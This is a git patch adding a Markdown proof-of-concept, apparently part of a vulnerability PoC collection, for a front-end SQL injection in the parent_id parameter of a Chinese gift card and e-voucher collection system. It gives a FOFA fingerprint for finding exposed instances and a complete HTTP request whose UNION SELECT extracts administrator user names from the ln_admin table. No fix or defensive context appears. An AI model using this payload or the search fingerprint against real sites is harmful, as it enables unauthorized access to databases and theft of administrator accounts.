From feee12d472ed6c7b551ade18133019d3559fc96c Mon Sep 17 00:00:00 2001 From: Rainyseason <73454853+Rainyseason-c@users.noreply.github.com> Date: Wed, 11 Jun 2025 15:22:27 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E7=A4=BC=E5=93=81=E5=8D=A1=E7=94=B5?= =?UTF-8?q?=E5=AD=90=E5=88=B8=E6=94=B6=E5=8D=A1=E7=B3=BB=E7=BB=9Fparent=5F?= =?UTF-8?q?id=E5=AD=98=E5=9C=A8=E5=89=8D=E5=8F=B0=E5=AD=98=E5=9C=A8SQL?= =?UTF-8?q?=E6=B3=A8=E5=85=A5.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../礼品卡电子券收卡系统parent_id存在前台存在SQL注入.md | 20 +++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 wpoc/礼品卡电子券收卡系统/礼品卡电子券收卡系统parent_id存在前台存在SQL注入.md diff --git a/wpoc/礼品卡电子券收卡系统/礼品卡电子券收卡系统parent_id存在前台存在SQL注入.md b/wpoc/礼品卡电子券收卡系统/礼品卡电子券收卡系统parent_id存在前台存在SQL注入.md new file mode 100644 index 0000000..01a7c9b --- /dev/null +++ b/wpoc/礼品卡电子券收卡系统/礼品卡电子券收卡系统parent_id存在前台存在SQL注入.md @@ -0,0 +1,20 @@ +# 礼品卡电子券收卡系统parent_id存在前台存在SQL注入 + +# fofa +``` +"/Application/Home/Static/css/style2.css" +``` + +# poc +```javascript +GET /Home/Api/getRegion/parent_id/1)%20union%20select%201,2,user_name,4,5,6,7,8,9%20from%20ln_admin%20where%20(1=1 HTTP/1.1 +Host: +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Referer: http://127.0.0.1:8066/ +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +Cookie: think_language=zh-CN; PHPSESSID=p4d3rprbojktlbnfhrd9gv1gk4 +Connection: keep-alive +```